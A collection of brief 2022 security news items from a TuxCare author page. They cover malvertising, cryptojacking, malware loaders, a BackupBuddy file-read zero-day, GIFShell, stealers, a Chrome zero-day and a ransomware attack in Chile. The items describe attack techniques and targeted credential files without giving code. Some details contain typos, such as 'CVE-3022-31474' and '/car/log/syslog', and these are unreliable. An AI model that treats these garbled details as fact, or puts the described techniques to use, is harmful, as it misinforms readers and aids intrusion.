Obanla Opeyemi, Author at TuxCare

Microsoft’s Edge news feed exploited to advance tech support scams

Security researchers at Malwarebytes have uncovered an ongoing malvertising campaign that injects ads into Microsoft’s Edge News Feed, redirecting potential victims to websites that promote tech support scams.

The Threat Intelligence team at Malwarebytes said the fraud operation had been running for at least two months and was considered one of the most extensive campaigns due to the amount of telemetry noise generated.

The attackers switch between hundreds of ondigitalocean.app subdomains to host their scam sites within a single day. The several malicious ads injected into the timeline of the Edge News Feed are also linked to more than a dozen domains.

The redirect flow, which is used to send Edge users to malicious websites, begins by checking the target’s web browsers for different settings such as time zones to decide whether they are worth their time, or if not, send them to a decoy page.

To redirect to their scam landing pages, the threat actors use the Taboola ad network to load a Base64-encoded JavaScript script to filter potential victims.

“The goal of this script is to only show the malicious redirection to potential victims, ignoring bots, VPNs and geolocations that are not of interest that are instead shown a harmless page related to the advert. This scheme is meant to trick innocent users with fake browser locker pages, very well known and used by tech support scammers,” explained Malwarebytes.

The sources for this piece include an article in BleepingComputer.

Hackers exploit Oracle WebLogic Servers and Docker APIs to mine Crypto

Cybersecurity company Trend Micro has uncovered a malware campaign in which threat actors exploit security vulnerabilities in the Oracle WebLogic Server to deliver cryptocurrency mining malware.

One of the malware that exploits the vulnerabilities is Kinsing malware. The operators behind Kinsing malware are notorious for looking for vulnerable servers to co-opt them into a botnet.

For the latest trend, the attackers use CVE-2020-14882, a two-year-old RCE remote code execution bug that targets unpatched servers to gain control of the server and drop malicious payloads. The flaw has a severity score of 9.8.

To successfully exploit the vulnerability, the attackers use a shell script that performs various sections, including removing the /car/log/syslog system logs, disabling security features and cloud service agents from Alibaba and Tencent, and killing competing mining processes.

After it has been successfully deployed, the shell script downloads the Kinsing malware from a remote server and takes action to ensure persistence.

Researchers from Aqua Security also identified another cryptojacking group called TeamTNT.

One of TeamTNT’s attack chains aims to crack the SECP256K1 encryption, and if successful, it could allow attackers to calculate the keys to each cryptocurrency wallet. The campaign aims to use the high but illegal computing power of its targets to run the ECDLP solver and obtain the key.

Two other attacks carried out by TeamTNT relate to the exploitation of exposed Redis servers and misconfigured Docker APIs to use coin miners and Tsunami binaries.

According to the researchers, the accounts (alpineos and sandeep078) are reportedly used to spread a variety of malicious payloads such as rootkits, Kubernetes exploit kits, credentials stealers, XMRig Monero miners, and even the Kinsing malware.

As a security measure, companies are recommended to configure the exposed REST API with TLS to mitigate hostile AiTM attacks, as well as to use credentials stores and helpers to host user data.

The sources for this piece include an article in TheHackerNews.

U.S. Seizes $30 Million Worth of Crypto from North Korean Hackers

Chainalysis, a U.S. company, said it had worked with the FBI to recover more than $30 million in cryptocurrency stolen from online video game maker Axie Infinity by North Korea-linked Lazarus Group, marking the first time digital assets seized by the malicious attacker have been recovered.

The amount recovered is just a percentage of the estimated $600 million that the FBI alleges North Korean hackers stole from the makers of a popular video game that allows users to earn digital currency.

“The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains,” Erin Plante, senior director of investigations at Chainalysis said.

Plante, Chainalysis’ lead investigator said the seizure, which will not be the last, is a significant development for law enforcement, and investigators are working hard to seize the remaining loot.

According to Plante, the chain analysis was involved in the seizures, using “advanced tracking techniques to track stolen funds to withdraw ATMs, and working with law enforcement and industry stakeholders to quickly freeze funds.”

The Lazarus Group had access to five of the nine private keys owned by transaction validators for Ronin Network’s cross-chain bridge. Subsequently, the group facilitated two withdrawal transactions: one for 173,600 Ether (ETH) and the other for $25.5 million Coin USDC, noting that the Lazarus group pocketed these funds using “over 12,000 different crypto addressees to date.” Chainalysis stated the stolen ETH coins were mixed in batches with the popular Tornado Cash mixed service.

The sources for this piece include an article in TheHackerNews.

Bumblebee Malware Offers a new Infection Chain

A new version of the Bumblebee malware loader has been discovered by researchers. The new strain of malware offers a new chain of infection, including the use of a PowerScript framework for stealthy reflective injection of a DLL payload into memory.

Unlike in the past, when it reached victims via e-mails containing password-protected zipped USO files, the new variant uses a VHD (Virtual Hard Disk) file instead of the ISO file. The new VHD file contains a LNK shortcut file.

Instead of running Bumblebee (DLL) directly, the LNK now executes “imageda.ps1,” which starts a PowerShell window and hides it from the user by abusing the ‘ShowWindow’ command. The SP1 script is obfuscated using Base64 and string concatenation to evade AV detection while loading the second stage of the PowerShell loader.

For the second stage of the infection, a similar disguise tactic is used as the first. This tactic includes the PowerShell module which is used to load the 64-bit malware into the memory of the PowerShell process through reflective injection.

“PowerSploit is an open source post-exploitation framework in which the malware uses a method, Invoke-ReflectivePEInjection, for reflectively loading the DLL into the PowerShell Process. This method validates the embedded file and performs multiple checks to ensure that the file is loaded properly on the executing system,” Cyble explains in the report.

The new chain of infection allows Bumblebee to load from memory and never touch the hard drive of the computer, minimizing the chances of being detected and stopped by antivirus tools. Increasing its stealthiness also provides the malware loader with a stronger initial access threat and increases its chances of enticing ransomware and malware operators.

The sources for this piece include an article in BleepingComputer.

Hackers Actively Exploit WordPress Zero-day Flaw

Wordfence, a WordPress security company, has warned of a zero-day WordPress vulnerability that is now being exploited by attackers.

The bug is in a WordPress plugin called BackupBuddy. BackupBuddy is a plugin that allows users to back up their entire WordPress installation from within the dashboard, including theme files, pages, posts, widgets, users, and media files.

According to Wordfence, the vulnerability is rooted in the Local Directory copy function, which is designed to store a local copy of the backups. The vulnerability is the product of an insecure implementation that allows attackers to download arbitrary files to the server.

“This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information,” Wordfence said.

The bug affecting BackupBuddy is tracked as CVE-3022-31474 and has a severity of 7.5. While the bug affects versions 8.5.8.0 to 8.7.4.1, it was fixed in version 8.7. 5, which was released on September 2, 2022.

Wordfence stated that the active exploitation of CVE-2022-31474 began on August 26, 2022. Since then, the platform has been able to block nearly five million attacks, with the majority of intrusions attempting to read files such as /etc/passwd, /wp-config.php,.my.cnf, and .accesshash.

Details of the vulnerability remained secret to prevent further exploitation by attackers.

“This vulnerability could allow an attacker to view the contents of any file on your server that can be read by your WordPress installation. This could include the WordPress wp-config.php file and, depending on your server setup, sensitive files like /etc/passwd,” said the plugin’s developer, iThemes.

BackupBuddy users are advised to upgrade to the latest version to fix the bug and prevent it from being compromised by attackers. Those who are already compromised should reset the database password, change WordPress Salts, and rotate API keys stored in wp-config.php.

The sources for this piece include an article in TheHackerNews.

Attackers use Watering Hole Attacks to Install ScanBox Keylogger

A China-based threat actor dubbed APT TA423 is carrying out waterhole attacks on domestic Australian organizations and offshore energy companies in the South China Sea to distribute the ScanBox reconnaissance tool to victims.

Waterhole Attack is a cyberattack on a specific organization in which malware is installed on a website that is regularly visited by members of the organization to infect computers used within the organization itself.

In order to successfully carry out their malicious activities, the attackers use the ScanBox framework. ScanBox is a customizable and multifunctional Javascript-based framework that is used by adversaries to carry out and convert reconnaissance operations.

ScanBox keylogger data from “waterholes” are part of a multi-level attack that gives attackers knowledge of potential targets that will help them launch future attacks against organizations.

To execute an attack, the attackers upload the malicious JavaScript to a compromised website where the ScanBox acts as a keylogger, snapping all user-entered activity on the infected website.

TA423 launches its attacks with phishing emails pretending to be from an employee of the “Australian Morning News,” a fictitious organization.

Targets are then advised to visit their “humble news website.” australianmorningnews[.]com. As soon as the target clicks on the link, they are redirected to a website whose contents are copied from actual news websites, and the malware framework is leaked to them.

The primary initial script of a ScanBox keylogger provides a list of information about the target computer, including the operating system, language, and installed version of Adobe Flash. ScanBox also performs an audit for browser extensions, plugins, and components such as WebRTC.

The sources for this piece include an article in ThreatPost.

New ‘GIFShell’ Attack Technique Exploits Microsoft Teams GIFs

A new ‘GIFShell” attack technique exploits bugs and vulnerabilities in Microsoft Teams to abuse legitimate Microsoft infrastructure, execute malicious files, execute commands, and exfiltrate data.

According to Bobby Rauch, the cybersecurity consultant and pentester who discovered the hidden vulnerabilities, the “GIFShell” technique allows attackers to create a reverse shell that transmits malicious commands via base64 encoded GIFs in Teams. The outputs are then exfiltrated through GIFs retrieved by Microsoft’s own infrastructure.

To create the reverse shell, attackers need to convince a user to install a malicious stager that executes commands and uploads command output via a GIF URL to a Microsoft Teams web hook.

Microsoft Teams vulnerabilities exploited by the malware include Microsoft Teams security controls bypass which allows external users to send attachments to Microsoft Teams users.

The malware also modifies sent attachments to allow users to download files from an external URL instead of the generated SharePoint link. It forges attachments from Microsoft Teams to appear as harmless files, but instead downloads a malicious executable program or document. It uses insecure URLs to allow SMB NTLM hash theft or NTLM relay attacks.

Microsoft supports sending HTML-based 64-encoded GIFs, but does not scan the byte content of these GIFs. This allows malicious commands to be delivered within a normal-looking GIF. Since Microsoft stores Teams messages in a parsable file located locally on the victim’s machine, it can be accessed by a less privileged user.

Microsoft servers fetch GIFs from remote servers that allow data exfiltration via GIF file names.

The sources for this piece include an article in BleepingComputer.

Prynt Stealer’s Backdoor Steals Data Stolen from Cyberattacks

A backdoor in information stealing malware, Prynt Stealer is used to steal data that is exfiltrated by other cyberattackers, according to Zscaler ThreatLabz researchers.

Already, the malware sells for $100 for a one-month license and $900 for a lifetime subscription, offering attackers tremendous capabilities. These include the ability to log keystrokes, steal credentials from web browsers, and suck data from Discord and Telegram.

Prynt Stealer code comes from two other open source malware families, AsyncRAT and StormKitty. New additions to the malware include a Telegram channel that collects information stolen from other threat actors through a backdoor.

To perform the data exfiltration, Prynt Stealer uses code copied from StormKitty with minor changes. The malware also includes an anti-analysis feature that equips the malware to continuously monitor the victim’s process list for processes such as taskmgr, netstat and wireshark,

As soon as the victim’s process list is detected, the malware blocks the Telegram command and control channels.

The researchers also identified two other variants of the malware written by the author of the malware, Prynt Stealer: WorldWind and DarkEye.

DarkEye is an implant with a free Prynt Stealer builder. The builder is designed to drop and execute a remote access trojan called Loda RAT, an AutoIT-based malware that can access and exfiltrate both system and user information. DarkEye also acts as a keylogger, takes screenshots, starts and terminates processes, and downloads additional malware payloads over a connection to a C2 server.

“While this untrustworthy behavior is nothing new in the world of cybercrime, the victims’ data end up in the hands of multiple threat actors, increasing the risks of one or more large-scale attacks to follow. Note that there are cracked/leaked copies of Prynt Stealer with the same backdoor, which in turn will benefit the malware author even without direct compensation,” write Zscaler ThreatLabz researchers Atinderpal Singh and Brett Stone-Gross.

The sources for this piece include an article in TheHackerNews.

Google Release Chrome Update to Fix New Zero-day Flaw

Google has released an emergency patch to fix a zero-day vulnerability exploited in the wild. Tracked as CVE-2022-3075, the zero-day flaw was discovered and reported on August 30, 2022 by an anonymous researcher.

The flaw is an insufficient data validation in Mojo. This refers to a collection of runtime libraries that provide a platform-agnostic mechanism for inter-process communication (IPC).

Google admitted that it “is aware of reports that an exploit for CVE-2022-3075 exists in the wild.” The tech giant however failed to provide additional specifics on the nature of the attacks that can help users prevent additional threat actors from exploiting the flaw.

Google ask users to upgrade to version 105.0.5195.102 for Windows, macOS, and Linux to mitigate imminent threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are advised to apply fixes as soon as they are available.

The update makes it the sixth zero-day vulnerability in Chrome that Google has patched since the start of the year. The other five flaws include CVE-2022-0609, CVE-2022-1096, CVE-2022-1096, CVE-2022-1364, CVE-2022-2294, CVE-2022-2856.

CVE-2022-0609 is as user-after-free vulnerability in the Animation component that if successfully exploited could lead to corruption of valid data and the execution of arbitrary code on affected systems.
CVE-2022-1096 is a zero-day flaw described as a type of confusion vulnerability in the V8 JavaScript engine.

CVE-2022-1364 is similar to CVE-2022-1096 since it is also a type confusion flaw in the V8 JavaScript engine.

CVE-2022-2294 is a heap overflow flaw in the WebRTC component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.

CVE-2022-2856 is a case of insufficient validation of untrusted input in Intents.

The sources for this piece include an article in TheHackerNews.

New Ransomware hits Chile’s Windows and Linux servers

A ransomware attack that began on Thursday, August 25, involved Windows and Linux systems operated by the Chilean government agency, and the incident was verified by the Chilean computer security and incident response team (CSIRT).

According to Chile CSIRT, the hackers stopped all running virtual machines and encrypted their files while adding the “.crypt” filename extension. The authority explained that the malware has functions for various types of malicious activity, including stealing credentials from web browsers, the list of detachable devices for encryption, and evading antivirus detection by means of execution timeouts.

The ransomware attack is a double extortion attack. The attackers provided the Chilean CSIRT with a communication channel through which they could negotiate the payment of a ransom. This will help prevent the attackers from leaking the files and unlock the encrypted data.

The attackers set a deadline of three days and threatened to sell the stolen data to other cybercriminals on the dark web. While the Chilean CSIRT did not name the group behind the attack, the extension attached to the encrypted files indicated, however, that the malware pointed to ‘RedAlert’ ransomware. RedAlert ransomware used the ‘.encrpt’ extension in attacks that targeted both Windows servers and Linux-VMWare ESXi machines.

In his analysis of the malware, Chilean threat analyst Germán Fernández stated that the strain appears to be entirely new and that the researchers with whom he analyzed the malware could not link it to known families.

“One particular thing about the attack, is that the threat actors distributed the ransom note at a previous stage to the deployment of the ransomware as the final payload, possibly for evasion issues or to avoid having their contact details leaked when sharing the final sample,” Fernández said.

To protect against further attacks, Chile’s cybersecurity organization recommends a number of security measures to all government agencies and large private organizations. These include using a properly configured firewall and antivirus tool, updating VMware and Microsoft assets, securing key data, verifying the configuration of anti-spam filters, implementing network segmentation, and patching and mitigating new vulnerabilities.

The sources for this piece include an article in BleepingComputer.

Resources

State of Enterprise Linux Cybersecurity ... Read More State of Enterprise Linux Cybersecurity ...
Dangerous remotely exploitable vulnerability ... Read More Dangerous remotely exploitable vulnerability ...
Securing confidential research data ... Read More Securing confidential research data ...
State of Enterprise Vulnerability Detection ... Read More State of Enterprise Vulnerability Detection ...
Demand for Rapid Risk Elimination for ... Read More Demand for Rapid Risk Elimination for ...
TuxCare Free Raspberry Pi Patching Read More TuxCare Free Raspberry Pi Patching